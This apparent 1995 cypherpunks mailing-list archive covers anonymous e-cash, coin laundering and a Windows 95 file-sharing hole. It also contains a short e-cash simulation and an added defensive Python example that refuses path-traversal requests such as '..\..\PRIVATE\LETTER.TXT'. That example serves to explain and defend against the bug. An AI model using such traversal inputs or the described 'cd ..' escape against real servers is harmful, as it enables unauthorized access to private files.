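    # Double spending is still caught on-line.
    try:
        bank.exchange(serial, sig, blinded)
        out["double_spend_rejected"] = False
    except ValueError:
        out["double_spend_rejected"] = True
    return out


if __name__ == "__main__":
    for key, value in run_scenarios().items():
        print(f"{key}: {value}")
```

The model treats the exchange connection as anonymous by fiat; it does not capture linkage through network addresses, timing or unusual amounts.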




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Sun, 22 Oct 95 19:51:48 PDT
To: cypherpunks@toad.com
Subject: Re: How can e-cash, even on-line cleared, protect payee identity?
Message-ID: <acb0502856021004848f@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 11:20 PM 10/22/95, Bryce wrote:

>I can imagine a future in which this requirement is not difficult to
>meet.  Perhaps it will be the case that you can accept a coin, open
>up a new ("anonymous") account with the bank, deposit the coin,
>withdraw a new coin of the same amount, close the account, and now
>have an untraceable coin all in a fraction of a second.

Bryce, we'll make you a believer in online clearing yet!

This is essentially the point several of us have been making, that if
"anonymous bank accounts" are allowed (_technically_, no problem), then Bob
can take his "possibly watched" piece of cash, deposit it with his bank in
his anonymous account, withdraw the same amount (or more, or less, it
doesn't matter if the account is truly anonymous) and neither Alice nor the
Bank know who got it.

As you note, Bob can even open a new account, deposit, withdraw, close the
account. This makes the bank a "digital coin laundry," such as Lucky Greene
and others have talked about.

If forbidden by law in the U.S., no problem using offshore banks.

--Tim May


Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: patrick@Verity.COM (Patrick Horgan)
Date: Sun, 22 Oct 95 20:12:26 PDT
To: hallyn@cs.hope.edu
Subject: Re: textbooks
Message-ID: <9510230308.AA00605@cantina.verity.com>
MIME-Version: 1.0
Content-Type: text/plain


Good suggestions all, but don't forget "Network Security Private Communication
in a PUBLIC World" by Kaufman, Perlman and Speciner.  This book covers a lot
of great stuff.  It doesn't use complicated math when not required, and explains
the math very clearly when it's needed.  It explains DES and IDEA well enough
in plain language that you can understand how to implement them.  While I love
Bruce's book, it's much harder to understand than NSPC.  I highly recommend
this book to everyone.  I don't think any crypto library would be complete 
without it.  It's in contention for the official bible of crypto along with
Bruce's book.

Patrick

> From: "Dana W. Albrecht" <dwa@corsair.com>
>  
> I also suggest "A Course in Number Theory and Cryptography, 2nd Edition"
> by Neal Koblitz, published by Springer Verlag.
> 
> "Applied Cryptography" is certainly the book of choice, but Koblitz
> is an excellent secondary reference for covering a lot of the relevant
> mathematics in more depth.
> 
> In my opinion, "Applied Cryptography" was written from the perspective
> of computer science, "The Codebreakers" was written from the perspective
> of history, and Koblitz's book was written from the perspective of
> mathematics.
> 
> They are all nicely complementary.
> 
> Dana W. Albrecht
> dwa@corsair.com
> 
   _______________________________________________________________________
  /  These opinions are mine, and not Verity's (except by coincidence;).  \
 |                                                       (\                |
 |  Patrick J. Horgan         Verity Inc.                 \\    Have       |
 |  patrick@verity.com        1550 Plymouth Street         \\  _ Sword     | 
 |  Phone : (415)960-7600     Mountain View                 \\/    Will    | 
 |  FAX   : (415)960-7750     California 94303             _/\\     Travel | 
  \___________________________________________________________\)__________/




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Harry S. Hawk" <habs@warwick.com>
Date: Sun, 22 Oct 95 17:14:16 PDT
To: blake@io.org (Blake Harris)
Subject: Re: NYT on Internet Flaws
In-Reply-To: <Zhchw8RRq4nf084yn@io.org>
Message-ID: <199510230013.UAA00605@cmyk.warwick.com>
MIME-Version: 1.0
Content-Type: text/plain


> > 
> > 	I completely agree that the reporters on this list make things
> > very difficult and people do need to be very careful about posting
> > things which will get misinterpreted by reporters.. but--

Blake writes..
> Folks:
> 
> Don't lose heart completely that your discussions on this list are
> not being read carefully by some of the media. As a case in point, I'm a
> freelance magazine writer who has been lurking on this list for at least 6
> months (although I do get behind at times due to the volume). My reason

I've been on this list almost since it started.. and in that time I've become
a freelance writer.. as have other more well known list members..

I think the thing to understand is that there is always room for
misinterpretation.. by reporters and by our own flames (if the list
traffic is any judge..)...

To speculate further on the human condition would be off topic..but
it's clear the Cypherpunks is a very valuable thing to many people for
many reasons and I think (from the point of self interest) to all of
society..

/hawk

Harry Hawk
habs@panix.com



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Sun, 22 Oct 95 20:03:03 PDT
To: cypherpunks@toad.com
Subject: (Fwd) DIGITAL CASH IN AN ELECTRONIC WORLD
Message-ID: <acb0542e59021004766b@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain



I saw this on the Cyberia list. Those of you near Washington, D.C. may find
this worth attending.

By the way, one of the speakers, Kawika Daguio, was once on this list (and
may still be, though I haven't seen posts from him in a while).

--Tim May



>Date: Sun, 22 Oct 1995 17:04:32 -0400
>Errors-To: thardy@mail.wm.edu
>Reply-To: cyberia-l@warthog.cc.wm.edu
>Originator: cyberia-l@listserv.cc.wm.edu
>Sender: cyberia-l@warthog.cc.wm.edu
>Precedence: bulk
>From: "Cleveland Thornton" <thornton@legalbits.com>
>To: Multiple recipients of list <cyberia-l@warthog.cc.wm.edu>
>Subject: (Fwd) DIGITAL CASH IN AN ELECTRONIC WORLD
>X-Listserver-Version: 6.0 -- UNIX ListServer by Anastasios Kotsikonas
>
>
>For those in the Washington, DC area, you may find the following
>meeting of interest,
>
>
>
>------- Forwarded Message Follows -------
>Date:          Sat, 21 Oct 1995 21:54:36 -0400 (EDT)
>From:          Andrew Grosso <agrosso@access.digex.net>
>To:            Cleveland Thornton <cthornto>
>Subject:       Please Post
>
>                THE FUTURE OF MONEY:
>       DIGITAL CASH IN AN ELECTRONIC WORLD
>
>        The evolution of money has now completed
>a one hundred eighty degree turn from the point
>where our economy began: from a barter marketplace;
>to paper currency; and, today, to pure information
>exchanged globally over telecommunications lines.
>Money is digital, and can be created, utilized,
>and transmitted by individuals and companies, as
>well as by governments.
>
>        On Thursday, November 2, at noon, the
>Computer Crime Subcommittee of the ABA will host
>a luncheon program which will examine the birth
>and promise of digital cash.  The speakers repre-
>sent all three of the important organizations
>participating in this venture: designers, bankers,
>and governments:
>
>Steve Crocker, Vice President in Charge of Develop-
>ment, CyberCash, Inc.  CyberCash is a Reston,
>Virginia, based company which was established in
>1994.  It is in the forefront of the development
>and implementation of digital cash in the global
>marketplace.  Dr. Crocker is himself involved in
>both the technical and regulatory aspects of this
>field.  His talk will include a description of just
>what digital cash is, and how we can expect it will
>be used in the future.
>
>Kawika Daguio, Federal Representative for Operations,
>Retail Banking, and Risk Management, American
>Bankers Association: Mr. Daguio represents the
>banking industry, and will discuss its concerns
>and hopes for the new currency, and how it expects
>that digital cash will change the industry.
>
>Stephen Kroll, Chief Counsel, Financial Crimes
>Enforcement Network: Mr. Kroll's agency is primarily
>concerned with the identification of money laundering
>and other violations of federal laws concerning the
>flow of money.  He will discuss the government's
>concerns over the effects digital cash will have on
>those laws, and how governments may seek to protect
>their currencies and their sovereignty.
>
>        The program will be in the form of a brown
>bag luncheon, and will take place at the ABA Criminal
>Justice Section's Washington offices, at 740 15th
>Street, N.W., Tenth Floor.  The program is free.
>For those who wish to order a brown bag lunch to be
>provided by the ABA, the cost is $11.50, which must
>be ordered beforehand and paid for at the time it is
>picked up.  (No cash accepted; make check payable
>to ABA Criminal Justice Section.)
>
>        For reservations, please contact Mable
>Muldrow, at (202) 662-1520.  For more information,
>contact the program's co-moderators, Andrew Grosso,
>Chair of the ABA Computer Crime Subcommittee, at
>(202) 663-9041 [E-Mail: agrosso@acm.org], and
>Daryl Jackson, Vice Chair of the ABA White Collar
>Crime Committee, at (202) 942-5000.
>__________________________________________________________
>Cleveland Thornton            202-543-9673 (Office)
>Attorney at Law               202-543-3482 (Fax)
>15 Second Street, N.E.        74746.1422@compuserve.com
>Washington, D.C. 20002-7301        thornton@legalbits.com
>
>HomePage http://www.clark.net/pub/cthornto/home.html
>__________________________________________________________
>
>






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: cman@communities.com (Douglas Barnes)
Date: Sun, 22 Oct 95 20:50:46 PDT
To: cypherpunks@toad.com
Subject: Digicash for-real announcement
Message-ID: <v02120d03acb0cf23ff9a@[199.2.22.120]>
MIME-Version: 1.0
Content-Type: text/plain



(Finally, not just a "wait around" announcement)
http://www.marktwain.com/ecash.html






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Frosty  <sotmesc@datasync.com>
Date: Mon, 23 Oct 95 01:06:28 PDT
To: proff@suburbia.apana.org.au
Subject: CSP
Message-ID: <199510230156.UAA09239@osh1.datasync.com>
MIME-Version: 1.0
Content-Type: text/plain



Frosty :::

AT&T ACCUSED OF DEFRAUDING !!!

     New York - AT&T Corp. is accused in a lawsuit of cheating millions of
residential long-distance customers out of billions of dollars by rounding
off calls to the next full minute.

     The Lawsuit, filed Thursday in state Supreme Court, claims AT&T
residential calls are billed in full minutes, meaning a call lasting one
minute and one second would be billed as a two-minute call.

     Business customers, on the other hand, are billed in six-second
intervals, meaning a one-minute, one-second call would be billed as
one minute, six seconds, the lawsuit claims.

-The Associated Press
-The Sun Herald
- 21 Oct 1995


* sotmesc@datasync.com    aka ---* Frosty, ilKhan of the SotMESC
* To send a submission, use this address with 'CSP' in the Subject line
* Thanks to: Voyager, 2600, LOD, Knight Lightning for supporting us
* Finger SotMESC or http://www.datasync.com/~sotmesc/sotmesc.html





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: todd@lgt.com (Todd Glassey)
Date: Sun, 22 Oct 95 21:27:01 PDT
To: tcmay@got.net (Timothy C. May)
Subject: Re: Reducing the Flames, Attacks, and Nit-Pickings
Message-ID: <v02110104acb0c8af0a3c@[204.156.156.4]>
MIME-Version: 1.0
Content-Type: text/plain


>At 2:18 AM 10/22/95, Todd Glassey wrote:
>
>>As an aside - What blows my mind is the number of cycles people spend
>>bitching and moaning about Java itself rather than working to create a
>>better solution.


My apologies, I should have taken this off-line with Dr. Fred. I did in my
response to him as I had some personal commentary to add which would have
been inappropriate to the list in general.


But you are right. These lists are meant for us to exchange important
information and technologies, not necessarily commentary as to what a "piece
of merde" something is.

I respect Dr. Fred's commentary and others where there is a "prize" for all
of us, but so much of the postings now happening seem to be of little
technical value.


Again I apologize to all and to you Dr. Fred for posting my response to
your statement to the world...


>
>
>The recent flames and attacks are pretty typical of mailing lists,
>especially mailing lists having 1200 highly-opinionated subscribers
>(gulp!). Not that I like the flames, but they're not the problem I want to
>really talk about.
>
>A trend that bothers me--and others too, from comments here--is the intense
>"feeding frenzy" that is going on with each and every new product, from
>Netscape, to Microsoft Network, to Java, to Digicash.
>
>Don't get me wrong--finding flaws is a useful thing to do. But this list is
>becoming _consumed_ by the _process_ of attacking products. Worse, many of
>the attacks are by innuendo, by rumors and speculations about what features
>a product has.
>
>My comments will likely vanish without a trace, but I urge folks to hold
>back a bit on jumping in with attacks and reports of problems. Be sure
>something is _really_ a flaw before sounding the alarms.
>
>--Tim May
>
>Views here are not the views of my Internet Service Provider or Government.
>---------:---------:---------:---------:---------:---------:---------:----
>Timothy C. May              | Crypto Anarchy: encryption, digital money,
>tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
>Corralitos, CA              | knowledge, reputations, information markets,
>Higher Power: 2^756839      | black markets, collapse of governments.
>"National borders are just speed bumps on the information superhighway."

Regards,

T. S. Glassey
Chief Technologist
Looking Glass Technologies
todd@lgt.com

(415) 324-4318








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <llurch@networking.stanford.edu>
Date: Sun, 22 Oct 95 21:42:41 PDT
To: High Society List <cypherpunks@toad.com>
Subject: Re: WinNews Special Issue (fwd)
In-Reply-To: <Pine.OSF.3.91.951021053719.24988A-100000@nic.wat.hookup.net>
Message-ID: <Pine.ULT.3.91.951022212659.1123A-100000@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


On Sat, 21 Oct 1995, Tim Philp wrote:

> I am on a Microsoft mailing list that is for developers of Win95 stuff. 
> Today I found this in my mailbox. This file details a security bug in 
> Win95 that I thought might be interesting to the group.
> Regards, 
> 
> Tim Philp
> Brantford, Ontario,
> Canada
...
> ---------- Forwarded message ----------
> Date: Fri, 20 Oct 1995 17:15:33 -0700
> From: WinNews@Microsoft.com
> To: WinNews@microsoft.nwnet.com
> Subject: WinNews Special Issue
> 
> UPDATED DRIVERS FOR WINDOWS 95 FILE AND PRINTER SHARING 
> SECURITY ISSUE - October 20, 1995
> 
> Microsoft wants its customers to know that it has
> discovered and fixed a potential security problem with file
> and printer sharing in Windows 95.  Only customers who have

What a fucking joke. The Samba development community told Microsoft about
this in *January*. Microsoft's fix for the same problem in Windows for
Workgroups is dated September 28. 

> enabled file and printer sharing - a non-default option -
> may have been at risk, and, to the best of our knowledge,
> no users have been harmed.

They must not have asked anybody, then.

> What are the issues? 
> File and Printer Sharing for NetWare Networks
> 
> Microsoft was recently made aware of an issue with File
> and Printer sharing for NetWare Networks which may affect
> data security for corporate users.
> 
> Only users whose environments meet both of the following
> conditions may be affected:
> 
>     1. They configure their machine to share files and
>         printers with other users on the network using File
>         and Printer Sharing for NetWare networks (This
>         option is not turned on by default)
>     2. They enable remote administration or install
>         Microsoft Remote Registry Services  (These options
>         are not turned on by default)

#2 is not actually required.

> If your configuration matches that listed above, it is
> possible for another user on the network to gain read-only
> access to your machine after the administrator has logged
> off the machine and until you restart your computer.  To
> correct this problem, Microsoft has issued an updated
> driver for File and Printer Sharing for NetWare Networks.
> The updated driver ensures that only valid administrators
> have access to the computer's drive.

Good for them.

Microsoft is also investigating a bug where you can map whole unshared
drives over IPX or SMB. Maybe they'll acknowledge the problem in February.

> File and Printer Sharing for Microsoft Networks (not MSN:
>     The Microsoft Network online service)
> 
> Microsoft is also issuing an update for a known problem
> with File and Printer Sharing for Microsoft Networks and a
> certain UNIX shareware network client (Samba's SMBCLIENT).
> The update corrects a problem with share-level security
> documented in the Microsoft Knowledge Base on October 9th.

This is incorrect. The acknowledgement of the bug, which was pointed out
to Microsoft in January, was not available until October 12. 

> The Samba SMB client allows its users to send illegal
> networking commands over the network. The Samba client is
> the only known SMB client at this time that does not filter
> out such illegal commands.  SMBCLIENT users do not
> automatically have access to the Windows 95 drive, and
> must know the exact steps to send these illegal commands.

I wonder what illegal commands they're talking about. All you have to do 
is "cd ..". The problem is that Microsoft assumed that anyone using SMB 
was mapping a drive on a WinTel box, and thus couldn't cd below root. They
provided no mechanism on the server end to ensure that this didn't 
happen.

The problem was not limited to SMB over TCP/IP; Samba was merely the only 
readily available software to (inadvertently) expose the problem.

> The updated driver prevents these illegal commands from
> being executed, preventing SMBCLIENT users from accessing
> the drive on which sharing is enabled.  With the updated
> driver, the SMBCLIENT user will only have access to those
> shared folders that the Windows 95 user has designated.

What a novel security feature. I am so glad that Microsoft came up with this.

> How do I get the Updated Drivers?
> (Please note that this only affects English language 
> versions of Windows 95.) 

Yup, they won't install on other language versions. So they're still 
vulnerable.

> Both drivers are available for immediate download from the
> Internet (http://www.microsoft.com/windows), The Microsoft

Specifically, http://www.microsoft.com/windows/software/updates.htm.

> Microsoft is committed to providing safe connectivity
> solutions for customers.  Microsoft takes this
> responsibility seriously and has worked, and will continue
> to work, with great speed to provide solutions for
> customer issues.   

Yes. Tell them about a huge, stoopid bug in January, and they will
acknowledge the bug in mid-October. In the meantime, they will directly 
lie to the press and users about it.

-rich
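
Added example (not part of the original message, and not Microsoft's or Samba's code): a Python illustration of the server-side check the message says was missing, where the server normalises a client-supplied path against the share root and refuses anything that lands outside it. The share root, file names and function names are constructed for illustration.

```python
import ntpath  # Windows path rules as pure string handling; runs on any OS

SHARE_ROOT = r"C:\SHARED\DOCS"  # constructed: the one folder the user shared


class OutsideShare(Exception):
    """The requested path resolves to a location outside the shared folder."""


def resolve_trusting(share_root, client_path):
    """Behaviour described in the message: the server joins whatever the
    client sends and never checks where the result lands."""
    return ntpath.normpath(ntpath.join(share_root, client_path))


def resolve_confined(share_root, client_path):
    """Server-side enforcement: normalise first, then require the result to
    be the share root itself or something beneath it."""
    root = ntpath.normpath(share_root)
    drive, rest = ntpath.splitdrive(client_path)
    if drive:
        # A drive letter or UNC prefix would replace the share root outright.
        raise OutsideShare(client_path)
    # SMB paths are share-relative, so a leading separator means "share root".
    candidate = ntpath.normpath(ntpath.join(root, rest.lstrip("\\/")))
    # Compare case-insensitively and on a component boundary, so that
    # C:\SHARED\DOCS2 is not mistaken for something inside C:\SHARED\DOCS.
    c, r = ntpath.normcase(candidate), ntpath.normcase(root)
    if c != r and not c.startswith(r + "\\"):
        raise OutsideShare(client_path)
    return candidate


def audit(requests, share_root=SHARE_ROOT):
    """Return (request, trusting result, confined verdict) for each request."""
    rows = []
    for req in requests:
        try:
            verdict = resolve_confined(share_root, req)
        except OutsideShare:
            verdict = "REFUSED"
        rows.append((req, resolve_trusting(share_root, req), verdict))
    return rows


# Constructed sample requests, as a client might send them.
SAMPLE_REQUESTS = [
    r"REPORT.TXT",
    r"SUB\..\NOTES.TXT",
    r"..",
    r"..\..\PRIVATE\LETTER.TXT",
    r"../../PRIVATE/LETTER.TXT",
    r"..\DOCS2\PLAN.TXT",
    r"D:\OTHER.TXT",
]

if __name__ == "__main__":
    for req, trusting, confined in audit(SAMPLE_REQUESTS):
        print(f"{req!r:32} trusting={trusting!r:32} confined={confined!r}")
```

The check runs on the normalised result rather than on the raw request string, so the ".." forms, the forward-slash variant and the sibling-folder prefix case are all decided the same way.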




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bryce <wilcoxb@nagina.cs.colorado.edu>
Date: Sun, 22 Oct 95 20:49:04 PDT
To: tcmay@got.net (Timothy C. May)
Subject: Re: How can e-cash, even on-line cleared, protect payee identity?
In-Reply-To: <acb0502856021004848f@[205.199.118.202]>
Message-ID: <199510230348.VAA02972@nagina.cs.colorado.edu>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----

 I, Bryce <bryce@colorado.edu> wrote:
> 
> I can imagine a future in which this requirement is not difficult to
> meet.  Perhaps it will be the case that you can accept a coin, open
> up a new ("anonymous") account with the bank, deposit the coin,
> withdraw a new coin of the same amount, close the account, and now
> have an untraceable coin all in a fraction of a second.


 the entity calling itself TC May <tcmay@got.net> allegedly wrote:
> 
> This is essentially the point several of us have been making, that if
> "anonymous bank accounts" are allowed (_technically_, no problem), then Bob
> can take his "possibly watched" piece of cash, deposit it with his bank in
> his anonymous account, withdraw the same amount (or more, or less, it
> doesn't matter if the account is truly anonymous) and neither Alice nor the
> Bank know who got it.


Now it seems to me that any ecash scheme, whether cleared on-line or
off-line, with or without double-spending-detection, will put the
payee at risk of identification by a collusion of the payer and the
bank.  As far as I can tell, Chaum's off-line,
double-spending-detecting DigiCash Ecash is no more or less
susceptible to this attack than is any other scheme.  (This is
because the e-coin must have a unique ID or serial number, and the
payer/bank collusion can trace the passage of that serial number to
identify the payee.)


TC May has stated that Chaum's off-line strategy enables
payee-identification by a payer/bank collusion, but it seems to me 
that this is incorrect, because payee-identification is *always*
possible by a payer/bank collusion under any scheme.


 ""TC May"":
> As you note, Bob can even open a new account, deposit, withdraw, close the
> account. This makes the bank a "digital coin laundry," such as Lucky Greene
> and others have talked about.


Right, if the bank allows anon accounts and/or accounts that can be
created and used with very little time/effort/expense.  Now if the
bank doesn't allow that then you could have a chain of
money-laundering "remailer" type services.  They will deposit the
coin for you and withdraw a new one, thus making it untraceable
*unless* they themselves are in on the collusion.


Perhaps you "chained remailer" people can apply your expertise to this
and invent for us a method of laundering your e-coin through a chain
of such services, making sure that a collusion of payer, bank and
*all* launderers is necessary to reveal your identity, and making
sure that the launderers themselves can't steal your coin.


Sounds impossible at first blush.


Regards,

Bryce

signatures follow


            "To strive, to seek, to find and not to yield."   
    <a href="http://ugrad-www.cs.colorado.edu/~wilcoxb/Niche.html">

                          bryce@colorado.edu                   </a>



-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Auto-signed under Unix with 'BAP' Easy-PGP v1.01

iQCVAwUBMIsPyvWZSllhfG25AQHwcAP/RJpn7M3xKPcTlBNapSVLzst40dla4qkZ
2tVVdqkFqRR2JWZXdaZv9IRJTroRmPN9gwu2nigA9KkOLfUsGXYZuMsJwfsnp5O0
aOarOFPntNFPkThOPUlzAUEECVKDUFAuChYiuThli8izbq+oWlKb83yE5uRxRI/7
T7a38Bebn7c=
=2YuJ
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: llurch@networking.stanford.edu (Rich Graves)
Date: Sun, 22 Oct 95 23:01:03 PDT
To: llurch@Networking.Stanford.EDU
Subject: Microsoft "Encrypted" Documents Hack FYI
Message-ID: <199510230600.XAA01477@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


I would provide the hack itself, but I'm on a Mac that lacks a proper
Base64 handler at the moment. For people who only know how to use
Netscape, the URL is news:465l8h$6sa@oznet03.ozemail.com.au.

-rich

From: lyal collins <lyalc@ozemail.com.au>
Newsgroups:
alt.security,comp.os.ms-windows.apps.misc,comp.os.ms-windows.win95.misc
Subject: Re: More Microsoft Security Bugs
Date: 19 Oct 1995 13:53:21 GMT
Organization: not very, at the moment
Lines: 366
Message-ID: <465l8h$6sa@oznet03.ozemail.com.au>
References: <llurch-1510951157410001@tip-mp3-ncs-3.stanford.edu>
NNTP-Posting-Host: slsyd3p02.ozemail.com.au
Mime-Version: 1.0
Content-Type: multipart/mixed;
        boundary="-------------------------------297591414826100"
X-Mailer: Mozilla 1.22 (Windows; I; 16bit)

Further to word document password protection, the attached offers a simple 
way to recover text in such files with this "protection".
The source is included - at least one shareware developer has taken up 
on this technique and releases a VB based version.
cheers, lyal

-rich graves, llurch@networking.stanford.edu
 moderator of the win95netbugs list
 http://www-leland.stanford.edu/~llurch/win95netbugs/faq.html
 My old PGP key has been compromised. Please finger this account
 for the revocation certificate and my new key.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Sun, 22 Oct 95 21:45:02 PDT
To: cypherpunks@toad.com
Subject: Re: Reducing the Flames, Attacks, and Nit-Pickings
Message-ID: <acb06aea5b021004cdd9@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 4:25 AM 10/23/95, Todd Glassey wrote:
>>At 2:18 AM 10/22/95, Todd Glassey wrote:
>>
>>>As an aside - What blows my mind is the number of cycles people spend
>>>bitching and moaning about Java itself rather than working to create a
>>>better solution.
>
>
>My apologies, I should have taken this off-line with Dr. Fred. I did in my
>response to him as I had some personal commentary to add which would have
>been inappropriate to the list in general.

Just to make things clear, when I quoted Todd Glassey's point (above), it
was because I _agreed_ with his point about the "bitching and moaning"
about Java, as an example. I was _not_ quoting it as an example of the
flames on the list, per se.

My concern is that the Cypherpunks list is evolving into a "bug list,"
concentrating on attacks on commercial products. As I've said, finding
major flaws in protocols is a useful thing to do, but having the list
focussed on debating the fine details of languages like Java and browsers
like Netscape seems to be less useful.

Worse, idle speculation about possible security flaws seems wasteful.

--Tim May

Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Sun, 22 Oct 95 22:06:17 PDT
To: cypherpunks@toad.com
Subject: Chaum's cash: backup?
Message-ID: <199510230504.WAA22965@netcom18.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


(I congratulate Chaum on his ecash trial. this is a milestone.)

the recent Chaum press release and information says that cash is
"downloaded" to your local computer. 

here is my question: of course, I'm sure they have some kind of
a backup system. would someone care to comment on it? 

say I download $1000 to my hard drive and it crashes. what to do?

if it was like "real" cash, then it really would be lost.

if it wasn't like real cash, and the bank was actually tracking
it, then they could determine whether it had been "spent" so far
or prohibit someone from "cashing it in" like a hold on a check.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bryce <wilcoxb@nagina.cs.colorado.edu>
Date: Sun, 22 Oct 95 21:35:23 PDT
To: Hal <hfinney@shell.portal.com>
Subject: Re: How can e-cash, even on-line cleared, protect payee identity?
In-Reply-To: <199510230253.TAA08888@jobe.shell.portal.com>
Message-ID: <199510230435.WAA03625@nagina.cs.colorado.edu>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----

 I, Bryce <bryce@colorado.edu>, wrote:
>
> Is there a scheme which will prevent this collusive payee 
> identification, and if so where can I read about it? 


 The entity calling itself "Hal" <hfinney@shell.portal.com> allegedly wrote:
> 
> One proposal I have seen here is to have a "coin changer" service which
> turns the received coin in at the bank for you. Then the payer and the
> bank and the coin changer all have to collude to identify you.  However
> you have to trust the coin changer not to steal your money.  So it better
> be a pretty trustworthy organization.


Especially since you didn't want anyone to know that you had that
coin in the first place.  This makes it somewhat more difficult to
announce to the world "Hey!  He just stole my coin!".


 I, Bryce:
> Now even if it were the case that the payee is always identifiable
> by a collusion of the bank and the payer (such as is the case in
> DigiCash Ecash), all this means is that you shouldn't accept a coin
> using one nym, and deposit it in the bank using another.  You need
> one bank account per nym, as well as one bank account per
> anonymous transaction, and then you have complete control over
> revelation of your identit(y/ies).


 "'Hal'":
> 
> It would still be less than perfect to have all of a given nym's
> transactions known.  In an ideal electronic cash system no transactions
> are linkable if the participants don't want it.


Careful here.  A given nym's transactions are known only if the
person that they were dealing with chooses to collude with the bank
and reveal it.  Hopefully this would not be the status quo!  (If the
status quo is going to be non-privacy, then we will be using a
different scheme in the first place...)


I mean: it is always true that a person who gave you money can say
"yeah, that's the guy I gave it to."  The only way that this is 
different from tangible cash is that the payer can *prove* to the 
bank that you are the recipient of their money.  And probably the 
bank and the payer together can prove it to the rest of the world.  
(Hm.  Would they be able to prove it?  Perhaps the only way they 
would be able to prove that would be to time-stamp all their 
coins!...)


 "'Hal'":
> In such a system you don't need an "account" as such, but rather the bank
> simply allows used cash to be checked and exchanged for fresh cash via
> anonymous connections.  This would be the most privacy-protecting system.


Again I see an opportunity for "polymorphism".  A bank can use the
very same, or at least a very similar protocol to service both
account-holders and "check-in/check-out" customers.  (Perhaps the
only differences would be the speed with which the bank services the
requests, and the rate at which the bank charges for the service.)


I am excited about polymorphism (such as 
<a href="http://www.communities.com/paper/agnostic.html"> Douglas
Barnes' "identity-agnostic" idea </a>) because of
social-engineering, evolutionary reasons.  Flexible protocols will
encourage institutions to compete by offering as much privacy,
security, off-line capability, efficiency, etc. as the customers
want, rather than dictating their own terms and trying to define the
market that way.  To the degree to which each capability is
economically beneficial, that capability will become the market
standard.


Regards,

Bryce

signatures follow


            "To strive, to seek, to find and not to yield."   
    <a href="http://ugrad-www.cs.colorado.edu/~wilcoxb/Niche.html">

                          bryce@colorado.edu                   </a>



-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Auto-signed under Unix with 'BAP' Easy-PGP v1.01

iQCVAwUBMIsaU/WZSllhfG25AQE4DgP7BoRHvHCXkS70z/612TW+QFxt8ZG5pN2t
DDAlHGJrqmQarCwpOuYB9FuPFb4Nw2vNUgqWE30/q0oe0uJvkbgrFgMTvRPX9w0P
KfKoboTP7LqpPMJzbtsp4eES8Rqw8IF3j5ZQnsXxln5sdpQwztOT9HfXF62VoLsm
Ln3bmGb2vPc=
=1RxY
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@echeque.com>
Date: Sun, 22 Oct 95 22:53:26 PDT
To: "Vladimir Z. Nuri" <cypherpunks@toad.com
Subject: Re: Chaum's cash: backup?
Message-ID: <199510230553.WAA08339@blob.best.net>
MIME-Version: 1.0
Content-Type: text/plain


At 10:04 PM 10/22/95 -0700, Vladimir Z. Nuri wrote:
>say I download $1000 to my hard drive and it crashes. what to do?
>
>if it was like "real" cash, then it really would be lost.

It is really lost.

Your disk drive contains information the bank *cannot* know.

If you do not know that information either, you cannot prove to
the bank or anyone else that you rightfully possess a legitimate coin.


 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous User <remailer-admin@ideath.goldenbear.com>
Date: Sun, 22 Oct 95 23:30:44 PDT
To: cypherpunks@toad.com
Subject: No Subject
Message-ID: <199510230540.AA22467@ideath.goldenbear.com>
MIME-Version: 1.0
Content-Type: text/plain


Was at a party Friday night and ended up having a few beers with a 
friend who works at a medium-large software publisher.  Turns out his
company recently received a letter from Netscape to the effect that
"we've noticed that there are 'x' copies of Navigator active
at your site - you should remember that commercial use requires a 
license fee", etc.  The friend didn't know if the count was per IP
address or per "magic cookie installation" (see discussion of a 
few weeks prior) or some other metric.

Not that getting paid for your work is evil, but it looks like Netscape's
interest in the use of its browser goes beyond simple curiosity or the
